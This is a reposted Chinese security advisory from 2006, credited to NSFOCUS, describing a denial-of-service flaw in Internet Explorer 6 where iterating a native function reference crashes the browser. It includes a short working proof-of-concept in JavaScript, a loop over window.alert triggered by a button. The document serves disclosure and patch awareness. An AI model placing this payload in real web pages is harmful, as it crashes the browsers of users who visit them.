[转载]Microsoft IE本地函数迭代器拒绝服务漏洞
信息来源:绿盟科技发布日期:2006-07-25
更新日期:2006-07-26
受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19140
Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。
Microsoft IE在处理网页中畸形指令时存在漏洞,远程攻击者可能利用此漏洞导致客户端的IE崩溃。
如果IE用户访问了恶意的WEB页面的话,在IE中迭代本地函数时会触发空指针引用,导致拒绝服务。
<*来源:H D Moore ([email]hdm@metasploit.com[/email])
链接:[url]http://browserfun.blogspot.com/2006/07/mobb-25-native-function-iterator.html[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
function Demo() {
// Iterate through any native function reference to crash
for (var i in window.alert) { var a = 1; }
}
</script>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://www.microsoft.com/windows/ie/default.asp[/url]
页:
[1]